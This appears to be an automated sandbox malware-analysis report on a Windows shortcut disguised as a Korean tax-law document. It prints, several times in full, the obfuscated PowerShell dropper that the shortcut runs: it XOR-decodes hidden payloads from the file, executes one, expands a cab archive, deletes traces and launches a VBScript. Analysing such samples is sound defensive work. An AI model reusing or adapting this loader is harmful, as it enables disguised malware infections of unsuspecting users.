Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Feb. 19, 2025, 3:19 p.m.	Feb. 19, 2025, 3:21 p.m.

Size	1.4MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`99c67ce86170a2ba77f879c6a4061ad0`
SHA256	`cc31bd52386d956ed8cdcadda2ad16a21d0a9a177722465b94c8960092139e08`
CRC32	`BCEED540`
ssdeep	`3072:mOEclNlSCpDrl3r3Vnb9NKTEaBX76PDtAtODz0EtlAb14LiP2:yCpDrlzVnbWrX7YDthhtSZWi`
Yara	Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IWzFgieEMMVP" "C:\Users\test22\AppData\Local\Temp\소명자료 목록(국세징수법 시행규칙).hwp.lnk"
2052
- cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation*0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford*0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) | <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;") )
  2180
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
    2288
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
      2348
    - findstr.exe findstr /i rshell.exe
      2384
  - powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation*0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford*0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) | <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;"
    2436
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\please.cab -F:* C:\Users\Public\documents
      2584

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:19 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 19, 2025, 3:19 p.m.			0	0

Command line console output was observed (50 out of 964 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: exist "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) \| <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;" console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: Method invocation failed because [System.IO.FileInfo] doesn't contain a method console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: At line:1 char:2366 console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: + function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substr console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ing(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boa console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: rding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarle console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: t,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.Fi console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: leStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMo console_handle: 0x00000083	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: de]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> console_handle: 0x0000008f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm console_handle: 0x0000009b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: honey#> $continent=$vocation*0x01;<#count popular#> $forked=New-Object byte[] console_handle: 0x000000a7	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#des console_handle: 0x000000b3	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ignation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#> console_handle: 0x000000bf	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: $verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford - console_handle: 0x000000cb	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford*0x01] -bxor console_handle: 0x000000d7	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $fo console_handle: 0x000000e3	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: rked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $co console_handle: 0x000000ef	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ntinued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $co console_handle: 0x000000fb	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ntinued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#s console_handle: 0x00000107	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: traddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};fun console_handle: 0x00000113	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ction prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten console_handle: 0x0000011f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ;<#preference technical#> return $street;};function steep{return Get-Location;} console_handle: 0x0000012b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ;function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$fore console_handle: 0x00000137	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: head = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet. console_handle: 0x00000143	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever console_handle: 0x0000014f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: -century $forehead;} return $doublet;};function collective{$chastity = $env:pub console_handle: 0x0000015b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: lic<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $ch console_handle: 0x00000167	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: astity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts' console_handle: 0x00000173	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: +'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param( console_handle: 0x0000017f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: $century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($ce console_handle: 0x0000018b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ntury, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) \| <#disgust sol console_handle: 0x00000197	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: emn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new << console_handle: 0x000001a3	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: << ($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor console_handle: 0x000001af	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: #> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$chari console_handle: 0x000001bb	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: table = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt console_handle: 0x000001c7	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor s console_handle: 0x000001d3	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: egment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 console_handle: 0x000001df	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working tu console_handle: 0x000001eb	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: rkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#light console_handle: 0x000001f7	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: ning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#f console_handle: 0x00000203	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: latter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive console_handle: 0x0000020f	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = d console_handle: 0x0000021b	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: efense;<#near afford#>back -intelligence $breach -continued <#consult abnormal# console_handle: 0x00000227	1	1
WriteConsoleW Feb. 19, 2025, 3:19 p.m.	buffer: >$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#> console_handle: 0x00000233	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac9e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ac328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acb28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ad0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ace68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006acee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
